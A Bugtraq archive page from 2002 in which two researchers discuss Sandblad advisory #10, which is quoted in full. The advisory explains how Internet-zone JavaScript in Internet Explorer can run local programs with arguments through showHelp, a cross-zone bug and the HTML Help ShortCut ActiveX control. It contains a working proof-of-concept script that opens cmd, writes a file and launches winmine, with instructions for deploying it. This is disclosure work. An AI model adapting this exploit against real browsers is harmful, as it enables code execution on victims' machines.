Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: How to execute programs with parameters in IE - Sandblad advisory #10

From: "jelmer" <jkuperus () xs4all nl>
Date: Fri, 8 Nov 2002 17:13:35 +0100
Hi Adreas

I just read his reply aswell and I dont agree with him on some points. Sure
enough there are ways to execute code despite restictions such as you
mention (not running activex components not marked safe for scripting) ,
like the http-equiv thingie where you drop a file (wich is really my icq
thingie revamped) to a known location and then excute it. but it always
required an external program to drop off the executable, your method works
on a plain IE browser, making it far more dangerous.

AFAIK It isn't so that being able to access the local zone automaticly gives
you the possibility to execute arbitrary code. eventhough it is possible to
get the paths to the TIF files as I explained already on bugtraq

http://cert.uni-stuttgart.de/archive/bugtraq/2002/09/msg00126.html

opening up some venues of exploitation,  I dont believe anyone succeeded in
making stuff run from there yet ( I know I haven't)

However despite the fact that what you found out is incredibly significant I
agree with microsoft and thor that its not a seperate vulnerability but
rather a method of leveraging existing exploits.

But where I am concerned I'd much rather see one of these finds then a 1000
method caching bugs.
Very nice work indeed.

I'll cc this to bugtraq for clarity sake

--
  jelmer





----- Original Message -----
From: "Andreas Sandblad" <sandblad () acc umu se>
To: "jelmer" <jelmer () kuperus xs4all nl>
Sent: Friday, November 08, 2002 4:34 PM
Subject: Re: How to execute programs with parameters in IE - Sandblad
advisory #10



Hi Jelmer!

I am having troubles understand how Thor Larholm reason when he says Local
computer zone = complete access to do whatever you want.
If you really were allowed to do whatever you want in that zone, how is
that scripting unsafe activeX controls are set to prompt in the Local
computer zone?
Ok, you can use the codebase attack, but if you can't get the location to
the temp. internet folders, then what harm can you do? You heard of a
legitim way of getting the exact path? I haven't...

Btw, I really think you have done some very nice security research.

Take care

/Andreas

On Fri, 8 Nov 2002, jelmer wrote:


nice one :)

this is really bad..

----- Original Message -----
From: "Andreas Sandblad" <sandblad () acc umu se>
To: <bugtraq () securityfocus com>
Sent: Wednesday, November 06, 2002 8:48 PM
Subject: How to execute programs with parameters in IE - Sandblad

advisory

#10




                  - Sandblad advisory #10 -

----------------------------------------------------------------
Title:      "How to execute programs with parameters in IE"
Date:       [2002-11-06]
Software:   Internet Explorer (webbrowser control)
Vendor:     http://www.microsoft.com/
Impact:     Javascript in "Internet zone" may
            execute programs with parameters       _     _
                                                 o' \,=./ `o
Author:     Andreas Sandblad, sandblad () acc umu se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6


(1) INTRODUCTION:
=================
By default all internet contents such as homepages are placed in the
"Internet zone". Local content viewed in IE runs in the "Local

computer

zone" with less restrictions.

In the past we have seen many vulnerabilities where script in the
"Internet zone" could access the "Local computer zone". The script

could

do actions like:
- Read local files if the exact path is known and file can be opened

by

IE.
- Execute local programs (exact path required) WITHOUT parameters

using

the codebase attack.

It will be shown in this document how script in the "Local computer

zone"

can actually be designed to run arbitrary programs WITH parameters

(exact

path not needed). The technique used may open up far more dangerous
attacks than seen before.


(2) VENDOR STATUS:
==================
Microsoft was initially contacted 2002-10-04. After several mail
exchanges, their final response were that the technique used to run
programs with parameters from the "Local computer zone" was no

security

vulnerability. A fix should instead be applied for all possibilities

for

content in the "Internet zone" to access the "Local computer zone".


(3) DETAILS:
============
Javascript can use the showHelp command to do one of the following two
operations:
1. Open a local compiled help file (.chm) in a separate winhelp

window.

2. Open an url (must begin with http://) in a separate winhelp window.
Script in window opened as (1) may use the shortcut command (activeX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.

After some investigations I found a way to make (2) use the shortcut
command. The following must be done:
3. Script in (2) gets access to the "Local computer zone".
4. Script in (2) changes url to "mk:@MSITStore:C:" or similiar.
5. A local compiled help file must have been opened since IE was first
started. Any help file will do. For example showHelp("iexplore.chm").

In order to achieve (3) there are several nonpatched "cross site/zone
scripting" vulnerabilites to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5)

is

trivial to achieve and will not affect the winhelp window for (2),

since

it is opened in a different window by default.

Before MS02-055 was released by Microsoft the above were a lot more

easier

to perform. (3) and (4) could then be skipped.


(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scripting"

vulnerability

published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692
It could also be possible to use one of the many "cross site/zone
scripting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/
Recently I reported a new "cross site/zone scripting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.

In order for not having to put script in 3 separate files I have

combined

them into one single file. The script will check for text after the #

sign

in the url to determine what to perform (url's hash). If your computer

is

heavily loaded, then the value of the setTimeout timer has to be
increased. The timer is needed because the "mk:@MSITStore:C:" url is

not

set directly by IE.

INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST

START

WITH HTTP://).
4. The script will open up a dos window and display a line of text,

create

the file c:/vulnerable.txt (write permission required) and start

winmine

(this excellent game must exist). The help window for IE will not be
closed.

TESTED:
Win2000 pro, XP, IE 6 (latest patches).

--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad () acc umu se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
   "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
   "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
   "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
   "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
</script>
--------------------------- CUT HERE ---------------------------


(5) Disclaimer:
===============
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


(6) Feedback:
=============
Please send suggestions and comments to:           _     _
sandblad () acc umu se                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad, student in Engineering Physics and
Computing Science at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--









--
    _     _
  o' \,=./ `o
     (o o)
-ooO--(_)--Ooo-
Previous By Date Next
Previous By Thread Next

Current thread: